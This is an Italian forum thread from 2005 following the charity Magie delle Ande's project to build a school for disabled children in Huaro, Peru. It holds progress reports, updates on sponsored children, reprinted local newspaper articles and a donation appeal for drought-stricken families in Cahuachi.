Il primo modulo è a buon punto!!!
Questo l'indirizzo:

http://www.magiedelleande.it/servizi/ru ... to_000.php (http://www.magiedelleande.it/servizi/rubriche/rubriche_2002131-cod_2802001-sito_000.php)

Ciao. Gabriele

gabrielepoli
19-01-2005, 15:53:50
Con grande emozione e gioia, annuncio ufficialmente a tutti i nostri
associati e agli amici che è costituita l’ASSOCIAZIONE MAGIE DELLE ANDE
DEL PERU’.

Con Scrittura Pubblica in data 10 agosto 2004, registrata presso SUNARP
(Sovrintendenza Nazionale dei Registri Pubblici del Perù) n° 2004-00229675
del 12/08/2004 l’Associazione Magie delle Ande del Perù ha iniziato ad
operare coordinando il PROGETTO HUARO (costruzione di un centro scolastico
per bimbi e ragazzi disabili).

Dallo statuto:
“La Asociación Sociocultural Latinoamericana Magie delle Ande del Perú se
constituye continuando con el espíritu de las actividades desarolladas por
la Asociación Magie delle Ande de Italia”
(“L’Associazione Socioculturale Latinoamericana Magie delle Ande del Perù
si costituisce seguendo lo spirito delle attività sviluppate
dall’Associazione Magie delle Ande d’Italia”).

Consiglio Direttivo MdA Perù:

Dottoressa Phyllis Tepperman Greenspan (presidente)


Camila Chavéz (coordinatrice
Progetto Huaro)


Professoressa Rufina Romero (direttrice Centro
Scolastico Progetto Huaro)


Nedda Ines Echegaray Bragagnini (consigliere/revisore)


Avvocato Wilfredo Garcia Noriega (consigliere/segretario)

Auguro al Consiglio Direttivo un buon lavoro!

Gabriele
http://www.peru.sudamerica.it
http://www.magiedelleande.it
http://www.machupicchu.peru.it
http://www.bolivia.sudamerica.it

Mariel74
20-01-2005, 20:01:51
Si, buon lavoro a tutti! :)

gabrielepoli
09-02-2005, 13:09:00
Oggi abbiamo completato la prima fase delle adozioni: diciassette dei nostri bimbi e ragazzi, i più assidui a scuola, sono stati adottati!
A marzo riprenderanno le lezioni, dopo le vacanze estive e le famiglie dei nostri fanciulli riceveranno una graditissima sorpresa: con le adozioni, cari amici, avete contribuito in modo notevole a migliorare la vita di questi vostri ragazzi, garantendo loro non solo la frequenza scolastica, i pasti e i trasporti, ma anche le terapie che ognuno di loro necessita.
Inoltre, siamo convinti che la notizia delle adozioni si spargerà fra i villaggi limitrofi, convincendo i genitori recalcitranti ad iscrivere alla nostra scuola molti altri bimbi disabili.
Una volta di più: grazie di cuore a tutti voi!

11-02-2005, 02:49:08
bene, sono proprio contenta e speriamo che gli altri genitori si convincano

grazie ancora

pinotina
17-02-2005, 18:53:23
Il vero grazie, caro Gabriele, va a te e chi si sta dando da fare laggiù!

gabrielepoli
17-02-2005, 20:58:57
Ecco l'ultimo resoconto di Phyllis, la presidente di MdA Perù. Potete anche vedere le foto a questo indirizzo: http://www.magiedelleande.it/servizi/ru ... to_000.php (http://www.magiedelleande.it/servizi/rubriche/rubriche_2002137-cod_2802001-sito_000.php)


Ciao!!!

Progetto Huaro: febbraio 2005


Visita a Huaro


Vale sempre la pena di ricordare gli inizi perché rinforzano in noi quello che ci motivò a prendere una decisione. Vediamo così che è valsa la pena scommettere su un obiettivo e assumere il rischio per cercare di portarlo a compimento.
Questo sentimento lo possiamo porre in relazione al Progetto Huaro che immagino sia un tema familiare per la maggioranza di coloro che leggeranno queste linee. Per chi ancora non lo conoscesse, si tratta della scommessa per la costruzione di una scuola per l’educazione speciale che si aggiunge come una modalità in più per l’educazione all’attuale scuola di Huaro, ma che funzionerà con una direzione e un’amministrazione indipendenti.

L’iniziativa del Progetto Huaro nacque grazie alla visita di Gabriele Poli e di un gruppo di turisti italiani che stavano compiendo un emozionante viaggio attraverso il Perù, oltre due anni orsono. Arrivando al villaggio di Huaro –a 40 km dalla città di Cusco- forono conquistati non solo dalla bellezza del luogo e dei suoi dintorni, ma anche da una serie di valori e necessità della popolazione; tutto ciò portò a concepire questo progetto.
Dopo aver scambiato alcune informazioni, si giunse ad una serie di accordi che portrarono alla collocazione della prima pietra di quella che sebbe diventata la futura scuola, in un atto simbolico realizzato il 18 agosto dello scorso anno nel terreno designato allo scopo, anche se la costruzione stessa di questa prima tappa composta da due moduli e da un muro perimetrale, sarebbe iniziata il 1° novembre. Oggi, primi giorni di febbraio del 2005, è ormai una realtà.

Sono appena tornata da una breve visita a Cusco. Devo dire che è stato molto emozionante andare nel luogo e vedere il risultato. Anche se ho fatto parte del progetto sin dall’inizio e se conoscevo il terreno, il villaggio e molte delle persone che stanno lavorando e aiutando, il mio impegno in questo processo era molto più in relazione con gli aspetti legali e burocratici. Quindi visitare due giorni fa il luogo dove si collocò quella prima pietra e vedere l’opera praticamente terminata, è stato davvero emozionante perché non solo si vedono la bellezza architettonica e il buon criterio nella creazione degli spazi, ma l’opera esprime una serie di tratti tradizionali nel materiale usato, nelle tecniche di costruzione e, come è pubblicato nell’articolo di Camila Chavéz –Direttrice del Progetto Huaro-, nella partecipazione di alcuni padri di famiglia attraverso il sistema tradizionale di lavoro conosciuto come faena.

Allo stesso modo, la visita mi diede l’opportunità di conoscere meglio l’équipe degli architetti –José, Luis, Gary e Everardo- conversare con i muratori e con il maestro d’opera. Dopo aver scattato alcune foto, avemmo la possibilità di sederci a conversare e di ringraziarli per l’impegno che hanno posto nell’opera, cosa che era evidente visto che stavano lavorando di domenica e non era un caso eccezionale. Volli ascoltare i loro commenti e, anche se ci volle del tempo, a poco a poco si animarono a partecipare alla conversazione. Il primo a superare la timidezza fu il maestro d’opera, René, fino a quando si aggiunsero alcuni altri. Ciò che più enfatizzarono fu che si sentivano grati per la possibilità di lavorare. Già verso la fine di questa piccola conversazione, si avvicinarono due muratori che si presentarono come padri di famiglia. Facevano parte dell’équipe iniziale di lavoratori che iniziò con la pulizia del terreno e sapevano che, a mano a mano che svolgevano il loro compito mantenevano il proprio diritto al lavoro.
Si potrebbero descrivere molti dettagli. Che il tetto coperto da tegole prodotte nel villaggio di Piquillacta, vicino a Huaro, non è un semplice tetto, ma possiede un movimento. Che possiede grazia. Che il legno usato per la struttura del tetto e delle finestre, appare nel soffitto dell’interno dei moduli disegnando linee graziose nel tetto. Che gli adobes (mattoni di paglia e fango. N.d.t.) elaborati in base ad una mescola che li rendono più forti, non solo hanno formato le pareti ma hanno creato uno spazio circolare con la capacità di concentrare energia. Che il paesaggio che circonda l’opera è impressionante per il verde e per le montagne della località, però anche che la scuola è protetta contro gli elementi della natura che potrebbero danneggiarla, come una pioggia torrenziale. Che il muro perimetrico è composto di pietre forti e “finestre” che permettono di integrare il paesaggio, ma pure stabilisce un limite importante dentro al quale i bimbi e i loro insegnanti lavoreranno con molto impegno per crescere e creare per loro un mondo di speranza e possibilità.
Alle persone che hanno condiviso l’interesse e l’impegno nel portare avanti questo progetto, ognuno per le proprie competenze, voglio dire che ne è valsa la pena, che vale la pena e che realmente abbiamo adempiuto a quella frase chiave che è scritta negli statuti delle associazioni MdA e che dice che: “L’Associazione Socioculturale Latinoamericana Magie delle Ande del Perù si costituisce in armonia con lo spirito delle attività sviluppate dall’Associazione MdA d’Italia”. E’ questo spirito di scommessa sulle buone cause e di dare i passi necessari fino a raggiungere l’obiettivo tracciato quello che dobbiamo continuare ad alimentare. Posso solo aggiungere che è molto bello sentirsi parte di questo.



Phyllis Tepperman

Presidente dell’Associazione Magie delle Ande del Perù.

18-02-2005, 20:57:06
Grazie Gabriele per la citazione di Phyllis, la presidente di MdA Perù e grazie a lei perchè leggendo le sue parole ci rende partecipi dell'emozione che dà lavorare ad un progetto e vederlo crescere; se poi il progetto è di tale portata e di tale attenzione ai bisogni altrui l'emozione non può che essere dirompente.

Grazie ancora

gabrielepoli
30-03-2005, 13:26:44
michael.jpg[/url]

trottola
30-03-2005, 14:42:54
michael.jpg[/url]

noooooooooooooo!!!! :013:
insegnate subito a Gabriele a mettere la foto del bambino, altrimenti chiamo GONZO!!!! :?D?: ;) ;) ;)

occhidigatto
30-03-2005, 14:47:57
Vogliamo la fotoooooooooooooo

gabrielepoli
30-03-2005, 14:54:13
Sono imbranato, lo so :002: ma...
ANDATE A VEDERE QUI!!!

http://www.magiedelleande.it/servizi/ru ... to_000.php (http://www.magiedelleande.it/servizi/rubriche/rubriche_2002151-cod_2802001-sito_000.php)

occhidigatto
30-03-2005, 15:00:22
http://www.magiedelleande.it/servizi/rubriche/images/2063-3b.jpg

Cucciolo :022: :022: :022:

trottola
30-03-2005, 15:30:56
sono già pazza di lui :022:

gabrielepoli
30-03-2005, 18:58:37
I nostri bimbi sono entrati nella nuova scuola!: le foto potete trovarle ai soliti indirizzi:
http://www.peru.sudamerica.it
http://www.magiedelleande.it


Gabriele

Cusco 28 marzo 2005


Oggi sono ufficialmente iniziate le lezioni nel distretto di Huaro e la nostra scuola, come tutte le altre, non ha perso tempo.
Stavamo attendendo questo giorno con molto entusiasmo, infatti non vedevamo l’ora di guardare i visetti dei bimbi e pure dei loro genitori al momento di entrare in questa nuova scuola.
La presenza di bambini e genitori non è stata completa (solo il 60%) ma ugualmente l’esperienza è stata incredibile. Si sono anche presentati vari bimbi nuovi con le loro madri che sperano di poter inserire i figli nei due posti liberi che ci restano. Attualmente abbiamo 18 immatricolazioni e non vogliamo superare il numero di 20 per poter seguirli meglio.
Durante questa prima settimana di scuola, non si svolgeranno attività educative propriamente dette, ma le giornate saranno utilizzate per abituare i bimbi alla nuova organizzazione spaziale, ai nuovi ambienti e all’uso adeguato di questi (ad esempio l’utilizzo dei bagni). Inoltre, ci auguriamo che durante questa prima settimana le presenze arrivino al 100%.


Passo a descrivere come si è svolto questo primo giorno, sperando di riuscire a trasmettere le mie emozioni.
I genitori e i bambini sono stati accolti nella vecchia scuola dove sono iniziati ad arrivare a partire dalle 8 del mattino. Formato un gruppo numeroso, a piedi, ci siamo diretti verso la nuova scuola. Alcuni genitori conoscevano già la struttura, visto che hanno contribuito alla costruzione, ma la maggioranza la stava per vedere per la prima volta.
Rufina Romero (la nostra direttrice) aveva decorato ogni sala con palloncini e messaggi di benvenuto che hanno reso l’ambiente ancora più bello. I genitori e i bambini hanno visitato tutta la scuola, facendo molte domande e pure critiche. In generale, la scuola è molto piaciuta.
Di seguito, abbiamo condiviso una cioccolata calda per inaugurare il nuovo refettorio. Le madri hanno usato la cucina per la prima volta e si sono mostrate molto entusiaste.
Poi, gli architetti incaricati della costruzione, José Everardo Rodriguez e José Luis Alvarez, hanno simbolicamente consegnato le chiavi di tutto il centro. Questo è stato un momento molto emozionante perché per la prima volta abbiamo concepito di aver completato con successo la prima tappa dei lavori.

Approfittando della presenza dei genitori, abbiamo anche voluto esporre tutti i benefici che i loro figli otterranno questo nuovo anno, con questa scuola e con l’appoggio di tutti i nostri genitori adottivi italiani che ringraziamo dal profondo del cuore.
Abbiamo parlato di come sarà risolto il problema del trasporto, di come migliorerà il menù giornaliero, dei nuovi materiali che arriveranno e dell’assistenza medica. I genitori si sono dimostrati molto contenti per queste notizie. Le loro espressioni sono un poco mutate quando abbiamo chiarito che tutti questi benefici si avranno a certe condizioni che si riassumono nella collaborazione dei genitori nell’educazione dei propri figli.

Pertanto, le condizioni necessarie perché tutti i bambini abbiano accesso ai benefici della nuova scuola sono:


- L’assiduità dei bambini a scuola e la puntualità;
- La presenza dei genitori alle riunioni e agli incontri che il personale ritengano necessari;
- La presenza e la partecipazione dei genitori ai lavori di gruppo a beneficio della scuola (ad esempio, la preservazione delle aree verdi e di gioco dei bambini);
- La collaborazione dei genitori con un giorno di lavoro al mese. Questa giornata di lavoro servirà per realizzare lavori di pulizia e per preparare il menù del giorno. Dato che la scuola conta 20 bambini, questo tipo di collaborazione ci assicura un genitore al giorno.


Se queste condizioni non saranno ottemperate, si penalizzerà la famiglia con il pagamento di una muta pari a 10 nuovi soles (2,5 euro) e se la mancanza di aiuto sarà continuativa, il bambino potrà essere ritirato dalla scuola.

Alcuni genitori non hanno avuto una buona reazione a queste richieste, affermando di non avere tempo. E’ iniziata una discussione vivace, tanto in quechua (la lingua degli inca, ancora comunemente parlata) come in spagnolo.
Personalmente, non credo si tratti di una richiesta esagerata dedicare all’educazione dei nostri figli un massimo di due giorni al mese e ancor meno quando i bambini ottengano tanti benefici. Per questo motivo, abbiamo deciso di essere intransigenti su queste norme. Attualmente abbiamo già una lista di attesa per oltre 10 bambini, con genitori molto motivati. Siamo coscienti che possiamo raggiungere i nostri obiettivi solo se avremo la collaborazione e l’adesione dei genitori, in caso contrario qualsiasi tipo di lavoro sarebbe inutile.
La mattina è proseguita meglio quando, approfittando dell’occasione, abbiamo consegnato a Ruth e a sua madre la prima sedia a rotelle. Sicuramente questo è stato il momento più emozionante della giornata.

Vogliamo ancora una volta ringraziare Susanna e Marco che lo scorso anno conobbero personalmente Ruth e non rimasero indifferenti di fronte al suo caso, decidendo di donare questa bella sedia. Grazie, mille grazie per il vostro gesto, spero che possiate tornare in Perù e voi stessi provare l’emozione che ho sentito quando ho spinto la sedia per la prima volta, osservando il bel sorriso di Ruth che sprizzava gioia.
E così, in modo tanto meraviglioso, si è concluso il nostro giorno…nelle prossime settimane tornerò a Huaro per verificare la presenza dei bambini nella scuola e poter raccontarvi un poco di più sul programma educativo che realizzeremo quest’anno.
Grazie a tutti voi per aver collaborato alla realizzazione di questo evento. Però voglio ricordarvi che non finisce qui. Mancano ancora molte cose da fare, altre tappe per la costruzione, altri obiettivi da raggiungere e per questo continueremo ad aver bisogno del vostro appoggio.



Camila Chávez.
Responsabile del Progetto Huaro di Magie delle Ande

Ricky
30-03-2005, 19:10:50
Vorrei sottolineare una cosa, non da poco.
Fare del bene è indubbiamente una bella cosa; fare del bene avendo dei resoconti così dettagliati ed appassionati è ancora più bello: sai che il tuo piccolo aiuto va a buon fine, sai che i soldi che spendi arrivano a destinazione e che finiscono là dove tu vuoi che finiscano.
Il progetto Huaro è tutto questo ed è stato conoscendo una persona così coinvolgente ed al tempo stesso determinata e seria come Gabriele che a noi di CSS è venuta la voglia di fiancheggiare e sostenere questa "pazza idea", che giorno dopo giorno si concretizza!

gabrielepoli
30-03-2005, 19:16:08
Eh no, non vale! Adesso mi commuovo! :)
Grazie Ricky, sei, siete fantastici!

occhidigatto
31-03-2005, 09:32:02
Grazie Gabriele!!!!!!!

gabrielepoli
31-03-2005, 15:37:43
Carissimi, ho appena ricevuto la prima informazione da parte di Rufina Romero, la direttrice della scuola, e ve la inoltro :)

Michael: ha partecipato al primo giorno di scuola in compagnia della madre. Questo ci ha fatto molto piacere perché la mamma, di solito, non collabora con noi. Quest’anno la vediamo molto più motivata ed entusiasta la qual cosa sicuramente ci aiuterà a raggiungere parecchi degli obiettivi che abbiamo in programma per Michael.
Michael ha trascorso una giornata molto allegra in compagnia del suo migliore amico Jhonatan. Promettiamo di inviare maggiori informazioni appena possibile…

trottola
31-03-2005, 15:39:17
Grazie Gabriele, leggere queste cose mi rende davvero felice!!
A presto :)

occhidigatto
31-03-2005, 15:45:24
Grazie di cuore!

Nel frattempo ho appeso la foto di Micheal in casa e mia mamma se n'è già innamorata! :022:

trottola
31-03-2005, 15:47:03
Anche la mia!! :002:
E poi la foto fa sbudellare, con quella faccetta e quel panino in mano!! :002: :022:

mark
31-03-2005, 16:07:23
E a me nessuna foto????? :-?
:107:

trottola
31-03-2005, 16:12:06
Cara, vai alla pagina precedente del topic e guarda com'è bellino il
nostro figlioccio!! :022:

mark
31-03-2005, 16:24:27
Che spettacolo! [smilie=684.gif]
Tutto sua madre (cioè...le sue madri...e i suoi padri....).
Insomma, uno splendore!
[smilie=728.gif] [smilie=728.gif] [smilie=728.gif]

occhidigatto
31-03-2005, 16:26:07
Troppo bellino nè? :022:

etta
31-03-2005, 21:08:19
Caro Gabriele, vorrai far felici anche le "mamme" degli altri bambini dando qualche anticipazione?
Salutissimi
Etta :022:

trottola
31-03-2005, 21:23:15
Etta ma anche tu sei una mamma di Huaro? :) :022:

etta
31-03-2005, 21:30:39
Si Trottola, ho adottato Elmer.

leander
31-03-2005, 21:32:08
Grande Etta!
Un carissimo abbraccio! :022:

gabrielepoli
31-03-2005, 22:54:37
Ciao Etta; il nostro web master sta preparando i moduli di invio...ma se mi mandi la tua mail personale ti mando le notizie in anteprima :) a meno che tu non voglia che le inserisca qui ;)

gabrielepoli
31-03-2005, 22:56:22
Dimenticavo, per scrivermi puoi farlo con i mess. privati oppure direttamente alla mia casella di posta:
gabriele.poli@magiedelleande.it
Bacioni.

trottola
01-04-2005, 07:21:23
Si Trottola, ho adottato Elmer.

Che bello, siamo colleghe MAMME :022:

etta
01-04-2005, 21:19:06
x Gabriele - ho inviato la mail all'indirizzo indicato nel post.

x Leander - sono alta solo 155 cm.

x Trottola - sono molto contenta anch'io di condividere con te l'esperienza

salutissimi
Etta

trottola
01-04-2005, 22:17:42
x Trottola - sono molto contenta anch'io di condividere con te l'esperienza



:077: :240:

occhidigatto
02-04-2005, 09:55:40
Un bacio al piccolo Micheal ed a tutti i bimbi di Huaro :022:
Vi pensiamo sempre!

gabrielepoli
12-04-2005, 15:07:57
Cara Etta, questo è il messaggio appena ricevuto da Camila riguardo a Elmer:

Elmer que parece estar enfermo, Rufina me ha prometido que
subira hasta su comunidad para ver, pues no es un niño con familia
problematica, todo lo contrario

(Elmer pare che sia ammalato, ma Rufina mi ha promesso che andrà nella sua comunità a vedere; comunque non è un bimbo con una famiglia problematica, al contrario).
Da questo, deduco che non ci siano problemi, si dovrà attendere solo che si rimetta.
Ciao!

etta
12-04-2005, 21:31:45
Grazie Gabriele, speriamo che si rimetta presto e possa cominciare ad andare a scuola.
Etta

trottola
12-04-2005, 21:36:25
Un grande abbraccio a Elmer ed a tutti i bambini di Huaro dalle loro mamme e dai loro MAMMI [smilie=703.gif]

sangiopanza
18-04-2005, 07:31:45
Domenica 17 Aprile 2005


Huaro, la solidarietà arriva a 3300 metri Prima lezione al centro disabili in Perù
Costruito grazie all’associazione berica Magie delle Ande e al Comune di Bolzano
È vicentino il progetto per ragazzi svantaggiati nelle Ande
Nel piccolo centro a 40 chilometri da Cusco il 28 marzo la nuova scuola ha aperto i battenti per 18 bambini tutti adottati a distanza grazie alla generosità vicentina. Gli abitanti hanno collaborato alla costruzione del primo modulo che comprende refettorio cucina e un laboratorio per le attività scolastiche. Dopo aver ultimato l’edificio si provvederà a dare un “mestiere” a ciascuno e ad organizzare una casa famiglia sul modello di quelle italiane


di Federico Ballardin



La solidarietà vicentina può arrivare anche in un paesino sperduto tra le Ande, nel Perù meno conosciuto, a 3300 metri di altezza. Nel villaggio di Huaro, a 40 chilometri da Cusco è stato inaugurato il 28 marzo scorso il primo modulo del centro scolastico per bambini e ragazzi disabili voluto dall’associazione vicentina Magie delle Ande Onlus.
Un’iniziativa che è nata per caso durante un viaggio di Gabriele Poli, il presidente, e scrittore dell’omonimo libro (che gli ha aperto la porta di numerose trasmissioni televisive). In cerca di itinerari fuori mano, a caccia dei retaggi dell’antica cultura quechua (così si chiamava il popolo da noi conosciuto come Incas: Sapa o Grande Inca era il sovrano e inca, in generale, era il termine usato per la nobiltà), Poli si è commosso di fronte alla mancanza di mezzi di una piccola struttura scolastica riservata a bambini disabili di Huaro, un paesino di 3000 anime. La scuola, era priva dei più elementari mezzi e organizzata in un edificio fatiscente, al limite dell’agibilità.
Attivando la rete di solidarietà, che molte radici ha anche nel vicentino, è stato possibile avviare un progetto assolutamente unico, che mira a riprodurre nel piccolo villaggio andino, un modello di assistenza sociale che a Vicenza funziona benissimo. L’iniziativa è stata sostenuta anche dall’Anffas di Vicenza, per quanto attiene al supporto organizzativo dei programmi di attività. Al viaggio dell’anno successivo - dopo che Poli nel 2003 aveva promesso alla comunità di Huaro e al suo sindaco l’interessamento di Magie delle Ande - nel 2004, ha preso parte anche Armando Polonioli, presidente onorario del Consorzio Lavoratori Studenti di Bolzano (C.L.S.).
Grazie anche a lui il Comune di Bolzano ha potuto stanziare 14 mila euro per la realizzazione del primo stralcio dei lavori del progetto huaro. Altri 15 mila dovrebbero arrivare a breve per completare il piano che mira a garantire ai 18 disabili della scuola non solo un adeguato insegnamento ma anche un futuro. «L’associazione - spiega Gabriele Poli - organizza dei viaggi turistici classici, toccando però anche località sconosciute al turismo; in questo modo riusciamo a raccogliere qualcosa per il nostro progetto. I rapporti con il sindaco e la comunità di Huaro sono ottimi: ci hanno concesso 2000 metri quadrati di terreno, dove è sorto il primo modulo del centro per disabili e dove sorgeranno, a breve e grazie all’aiuto dei nostri soci e simpatizzanti, i due moduli rimanenti».
Alla costruzione hanno partecipato anche alcuni abitanti di Huaro che così hanno potuto guadagnare qualcosa. Al momento il centro dispone di un refettorio, cucina e di un laboratorio per le lezioni, oltre ai servizi igienici e ad un ufficio amministrativo. In futuro si dovranno costruire altri laboratori, una sala di idroterapia e i dormitori sia per i ragazzi, sia per eventuali volontari che desiderassero recarsi a Huaro per collaborare. Il centro è stato volutamente costruito vicino alle scuole del paese per favorire l’integrazione dei disabili con gli altri ragazzi di Huaro.
Tutti i 18 “alunni” del centro sono stati adottati a distanza grazie alla rete di contatti dell’associazione Magie delle Ande, ma presto se ne aggiungeranno altri perché i bimbi disabili, purtroppo, non mancano. Il costo di mantenimento di un bambino è di circa 1 euro al giorno che comprende anche le cure mediche. Nonostante questo molti di loro avevano problemi a poter andare a scuola tutti i giorni perché le famiglie, poverissime, non potevano permettersi il costo del trasporto. È così dovuta intervenire, ancora una volta, la sezione locale dell’associazione (la Piccola Locanda, sede ufficiale di Magie delle Ande a Cusco) che ha ridotto della metà le spese a carico delle famiglie.
Il fondamentale appoggio dei vicentini ha permesso anche di aumentare la qualità del servizio offerto, da una insegnante il numero è salito a tre: una è stipendiata dal governo peruviano, la seconda interamente da Magie delle Ande, mentre la terza è stipendiata per metà dal Comune di Huaro e per metà dalla Piccola Locanda. Questo ha permesso di realizzare progetti personali sui ragazzi (come avviene in Italia).
«Il nostro progetto è ancora più ambizioso - spiega Gabriele Poli - vorremmo infatti costruire un hotel con annesso ristorante dove far lavorare i disabili con maggiori capacità, come aiuto cuoco o cameriere, ad esempio. Infatti i ragazzi possono rimanere a scuola fino a circa 20 anni, 25 al massimo, e si pone il problema sia dal punto di vista lavorativo sia, quando i genitori saranno troppo vecchi per accudirli, del “dopo”. Ecco perché vorremmo anche realizzare una casa famiglia, esattamente come quelle che ci sono a Vicenza». Tutte le informazioni e gli aggiornamenti sul Progetto Huaro, si possono trovare nel sito della Onlus vicentina (www.magiedelleande.it (http://www.magiedelleande.it)) o sul portale www.peru.sudamerica.it (http://www.peru.sudamerica.it).




© Copyright 2003, Athesis Editrice S.p.A. - Tutti i diritti riservati - [Credits]
Da " Il Giornale di Vicenza"

sangiopanza
18-04-2005, 08:15:34
Domenica 17 Aprile 2005


Il “Pago alla Pachamama” è una cerimonia religiosa con cui il “curandero”, lo sciamano, ha benedetto la nuova struttura
Riti millenari invocano la buona sorte


(fe. ba.) Un rito magico, antichissimo e misterioso. Il centro scolastico per bimbi e ragazzi disabili di Huaro è stato “benedetto” dal curandero (sciamano) secondo le tradizioni che si tramandano da millenni nelle Ande, prima ancora che il popolo Inca costruisse il suo impero. Un rito in qualche modo “ibridatosi” con la conversione al cattolicesimo di gran parte della popolazione, e che dunque comprende anche alcune invocazioni ai santi cattolici e alla Vergine, secondo un sincretismo religioso che nelle Ande, e in Perù, è tollerato dalla Chiesa locale nel rispetto delle secolari tradizioni del popolo quechua.
Si chiama Pago alla Pachamama (offerta alla Madre Terra) ed è una cerimonia religiosa che coinvolge tutta la comunità e che si celebra in grandi occasioni come l’inaugurazione di un edificio pubblico. Il 18 agosto scorso il curandero ha benedetto così il terreno su cui doveva sorgere il centro per disabili. Il rito prevede alcune offerte alle divinità tutelari, gli Apu (generalmente divinità locali che possono identificarsi in un fiume o nelle montagne) dolcetti, tabacco, pupazzetti sacri in terracotta e fiori. Immancabile l’offerta di foglie di coca, la pianta sacra e magica per eccellenza nella cultura andina. Le sue proprietà mediche ed energetiche erano usate migliaia di anni prima della nascita di Cristo, e attraverso le sue foglie si scrutava il passato, si interpretava il presente e si prediceva il futuro. Il rito dura un’ora e mezza.
Il curandero beve il tradizionale liquore di canna, spruzzandolo sopra ad una coperta che funge da altare. Intorno la comunità attende in silenzio, ascoltando le preghiere in quechua o Runa Simi (Lingua degli uomini), il linguaggio usato dal popolo Inca. Ognuno dei presenti riceve poi tre foglie di coca che vengono intinte in una mistura di tabacco e liquore di canna da spruzzare sul luogo da benedire. Nel buco scavato nel terreno, intanto, giace un mattone di adobe, una mistura di fango e paglia con la quale si costruiscono i mattoni “crudi” lasciati cuocere al sole e poi legati insieme da una malta prodotta sempre con argilla e paglia e amalgamata con i piedi. Anche questo mattone è un materiale usato dalle antichissime popolazioni andine che costruivano con la pietra solida solamente gli edifici più importanti o sacri (come la città di Machu Pichu). Sopra al buco, intanto, è sistemato un treppiede che sostiene un’anfora ricolma di Chicha, birra di mais fermentato che è la più antica bevanda alcolica conosciuta in Sudamerica.
La cerimonia si conclude con una sorta di “varo”: è toccato al presidente dell’associazione Magie delle Ande, il vicentino Gabriele Poli, rompere l’anfora lo scorso 18 agosto e così bagnare con la birra il primo mattone della costruzione in favore dei disabili. La cerimonia si conclude con l’aspersione di essenze, incensi e fiori. Gli spiriti maligni sono esorcizzati.




© Copyright 2003, Athesis Editrice S.p.A. - Tutti i diritti riservati - [Credits]

sangiopanza
18-04-2005, 08:17:08
Domenica 17 Aprile 2005


Una coppia regala la sedia a rotelle alla sfortunata bambina peruviana
Il sorriso della piccola Ruth illumina il primo giorno di scuola


Il sorriso di Ruth, una sfortunata bambina di Huaro, è stato il coronamento di una giornata importante, quella del primo giorno di scuola per i diciotto ragazzi iscritti alla scuola, il 28 marzo scorso.
La bambina, muta e con disabilità psichica e fisica non poteva più essere portata sulle spalle dalla madre. Dopo l’operazione andata male, che aveva compromesso le capacità motorie della figlia, la donna era costretta a portarla di peso. Ma Ruth era ormai diventata troppo grande e la madre non ce la faceva più.
Per sua fortuna una coppia di Roma, aggregata alla comitiva di Magie delle Ande, ha preso a cuore il caso e, una volta tornata in Italia, ha provveduto ad acquistare una moderna sedia a rotelle da poter usare per le strade di Huaro.
La consegna della sedia a rotelle è avvenuta proprio nel primo giorno nella nuova scuola costruita grazie alla tenacia dell’associazione vicentina. «Grazie mille per il gesto - ha scritto la responsabile del Progetto Huaro, Camilla Chavez rivolta alla coppia di benefattori - spero possiate provare la stessa emozione di quando ho spinto la carrozzella e ho visto il bel sorriso di Ruth».

gabrielepoli
18-04-2005, 08:36:28
Grazie Sangio :)
E' un articolo apparso ieri su Il Giornale di Vicenza: fa molto piacere perché è utile come immagine per il nostro progetto.

sangiopanza
18-04-2005, 08:45:07
Piccolo rimprovero: far presente, da parte del giornalista, che sono coinvolti anche non vicentini, specie i frequentatori di CSS?
Ma non ti preoccupare: tanto lo so come sono i giornalisti.

gabrielepoli
18-04-2005, 09:06:40
Che ci vuoi fare...devono enfatizzare la presenza di vicentini...

Ricky
28-04-2005, 22:16:07
Volevo segnalare che Magie delle Ande sarà presente a Padova all'edizione di Civitas, con un suo stand.
Chi si recasse là può contribuire a sostenere il progetto Huaro!
Per info su Civitas: http://civitas.iks.it/xpcivitas/web/ita/home.jsp

Ricky
25-05-2005, 11:56:00
Per un resoconto completo dei numeri che hanno caratterizzato la Fiesta Latina 2005, vai qui!
http://www.cisonostato.it/page.php?id=1034

poochie76
25-05-2005, 12:01:38
Che dire....bravi ragazzi!!! :022:

occhidigatto
25-05-2005, 12:03:24
Mille bravi a voi e mille bravi a noi :027:

Ricky
01-06-2005, 19:24:11
RICEVIAMO DA GABRIELE, e volentieri pubblichiamo:

01/06/05 Appello urgente per Cahuachi!
Diamo un aiuto alle famiglie abbandonate

Cari amici, mi permetto di inserire qui la mail privata che mi ha inviato Francesca (Cahuachi) perché c'é bisogno di tutti noi! Diamole una mano, diamo una mano a queste famiglie abbandonate a loro stesse, senza possibilità di di sfamare i propri figli, a causa della grande siccità che sta colpendo le loro povere coltivazioni. In calce alla mail vi scrivo i riferimenti del conto corrente Magie delle Ande di Banca Etica per eventuali donazioni. A chi desiderasse aiutare, chiedo di specificare nella donazione "Pro Cahuachi". Grazie di cuore. Gabriele

Gabriele mi devi aiutare a fare qualcosa! Ti dico questo perche' ho visto condizioni peggiori della volta scorsa, niente cambierà mai per loro. Adesso e' un periodo di siccita' e nessuno o quasi ha potuto ancora seminare niente perche' non c'era acqua.
E la ciliegina sulla torta qual e'? Che PRONAA non da' piu' i viveri ai comedores populares (mense popolari) perche' ha trasferito la competenza al municipio e quindi da quasi due mesi tutti i comedores delle chacras (campagne) non funzionano piu'. Puoi immaginarti?

Io mi sento in dovere di fare qualcosa per loro, Gabriele il mio cuore e' qui, piango per loro, perche' mi sento impotente e se potessi risolverei cosi' poco che resterebbe il mare ancora da attraversare. Pero' devo cominciare con una goccia, e quella goccia e' riattivare i comedores. Ho ieri chiesto alla presidente di Cruz Roja (Croce Rossa) che si interessi di questo problema, mi ha promesso che lunedi andra' da quel cretino di alcalde a parlarci...pero' non che questo mi dia garanzie di riuscire a
risolvere la cosa.

Ho chiesto alla presidente del comedor di Cahuachi che mi prepari un preventivo delle spese dei viveri che serve per 20 famiglie della zona per la durata di un mese. Mi aiuterai a trovare il modo di finanziare un intervento di emergenza per qualche mese per lo meno, ma sarebbe bello potergli garantire non so come 200 euroal mese per soddisfare i bisogni alimentari di 20 famiglie. Sono tante 20famiglie...Io posso fare una donazione privata certo, ma ho bisogno di qualcun altro che metta dei soldi. Potremmo fare un appello nel sito, se tu lo permetti.

So che Huaro sta assorbendo i pochi finanziamenti che l'associazione riceve, pero' io lo stesso non posso non chiederti aiuto per questa situazione che troppo mi sta a cuore.

Lo chiedo prima a te, perche' ti conosco e viceversa, ma senno' allarghero' la domanda a chiunque possa aiutarmi ad aiutare il pueblo di Cahuachi.

